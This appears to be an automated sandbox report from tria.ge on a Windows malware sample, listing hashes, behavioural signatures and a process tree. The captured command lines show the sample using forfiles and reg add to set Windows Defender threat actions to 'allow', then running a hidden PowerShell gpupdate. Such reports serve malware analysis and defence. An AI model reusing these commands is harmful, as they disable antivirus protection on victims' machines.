Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
68s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/09/2024, 15:21
Static task
static1
Behavioral task
behavioral1
Sample
fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
Resource
win10v2004-20240802-en
General
-
Target
fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe
-
Size
6.7MB
-
MD5
608fe9a6d6ef81a885f55a989f45b710
-
SHA1
e9e60dd64b66f324ce953554179f3d3c5544f0ca
-
SHA256
fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77
-
SHA512
670067a4211326eaa995d3f3817ec4dbf0075b042882d46de1aa9ec98794fa1acf722c2cf81111df1fb41afca292c70a6324be389f17f304bfe85a94a3177393
-
SSDEEP
196608:HC7vgxkdo2BI5dUCz8PtxCvFSRPwdUCFqP6tc:H+vbdo+I4KsSCYtkiC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2588 powershell.exe -
Indirect Command Execution 1 TTPs 5 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid Process 2684 forfiles.exe 2688 forfiles.exe 2672 forfiles.exe 2808 forfiles.exe 2812 forfiles.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2944 2844 WerFault.exe 29 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gpupdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2588 powershell.exe 2588 powershell.exe 2588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30 PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30 PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30 PID 2844 wrote to memory of 2168 2844 fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe 30 PID 2168 wrote to memory of 2808 2168 cmd.exe 32 PID 2168 wrote to memory of 2808 2168 cmd.exe 32 PID 2168 wrote to memory of 2808 2168 cmd.exe 32 PID 2168 wrote to memory of 2808 2168 cmd.exe 32 PID 2808 wrote to memory of 2796 2808 forfiles.exe 33 PID 2808 wrote to memory of 2796 2808 forfiles.exe 33 PID 2808 wrote to memory of 2796 2808 forfiles.exe 33 PID 2808 wrote to memory of 2796 2808 forfiles.exe 33 PID 2796 wrote to memory of 2788 2796 cmd.exe 34 PID 2796 wrote to memory of 2788 2796 cmd.exe 34 PID 2796 wrote to memory of 2788 2796 cmd.exe 34 PID 2796 wrote to memory of 2788 2796 cmd.exe 34 PID 2168 wrote to memory of 2812 2168 cmd.exe 35 PID 2168 wrote to memory of 2812 2168 cmd.exe 35 PID 2168 wrote to memory of 2812 2168 cmd.exe 35 PID 2168 wrote to memory of 2812 2168 cmd.exe 35 PID 2812 wrote to memory of 2996 2812 forfiles.exe 36 PID 2812 wrote to memory of 2996 2812 forfiles.exe 36 PID 2812 wrote to memory of 2996 2812 forfiles.exe 36 PID 2812 wrote to memory of 2996 2812 forfiles.exe 36 PID 2996 wrote to memory of 2708 2996 cmd.exe 37 PID 2996 wrote to memory of 2708 2996 cmd.exe 37 PID 2996 wrote to memory of 2708 2996 cmd.exe 37 PID 2996 wrote to memory of 2708 2996 cmd.exe 37 PID 2168 wrote to memory of 2684 2168 cmd.exe 38 PID 2168 wrote to memory of 2684 2168 cmd.exe 38 PID 2168 wrote to memory of 2684 2168 cmd.exe 38 PID 2168 wrote to memory of 2684 2168 cmd.exe 38 PID 2684 wrote to memory of 2984 2684 forfiles.exe 39 PID 2684 wrote to memory of 2984 2684 forfiles.exe 39 PID 2684 wrote to memory of 2984 2684 forfiles.exe 39 PID 2684 wrote to memory of 2984 2684 forfiles.exe 39 PID 2984 wrote to memory of 2780 2984 cmd.exe 40 PID 2984 wrote to memory of 2780 2984 cmd.exe 40 PID 2984 wrote to memory of 2780 2984 cmd.exe 40 PID 2984 wrote to memory of 2780 2984 cmd.exe 40 PID 2168 wrote to memory of 2688 2168 cmd.exe 41 PID 2168 wrote to memory of 2688 2168 cmd.exe 41 PID 2168 wrote to memory of 2688 2168 cmd.exe 41 PID 2168 wrote to memory of 2688 2168 cmd.exe 41 PID 2688 wrote to memory of 2560 2688 forfiles.exe 42 PID 2688 wrote to memory of 2560 2688 forfiles.exe 42 PID 2688 wrote to memory of 2560 2688 forfiles.exe 42 PID 2688 wrote to memory of 2560 2688 forfiles.exe 42 PID 2560 wrote to memory of 852 2560 cmd.exe 43 PID 2560 wrote to memory of 852 2560 cmd.exe 43 PID 2560 wrote to memory of 852 2560 cmd.exe 43 PID 2560 wrote to memory of 852 2560 cmd.exe 43 PID 2168 wrote to memory of 2672 2168 cmd.exe 44 PID 2168 wrote to memory of 2672 2168 cmd.exe 44 PID 2168 wrote to memory of 2672 2168 cmd.exe 44 PID 2168 wrote to memory of 2672 2168 cmd.exe 44 PID 2672 wrote to memory of 2776 2672 forfiles.exe 45 PID 2672 wrote to memory of 2776 2672 forfiles.exe 45 PID 2672 wrote to memory of 2776 2672 forfiles.exe 45 PID 2672 wrote to memory of 2776 2672 forfiles.exe 45 PID 2776 wrote to memory of 2588 2776 cmd.exe 46 PID 2776 wrote to memory of 2588 2776 cmd.exe 46 PID 2776 wrote to memory of 2588 2776 cmd.exe 46 PID 2776 wrote to memory of 2588 2776 cmd.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe"C:\Users\Admin\AppData\Local\Temp\fe102286866ca9377249551ec2794b4564fb00f5cf21b4c9992040b3b13b2c77N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2996 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2780
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2560 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:852
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:1396
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 2402⤵
- Program crash
PID:2944
-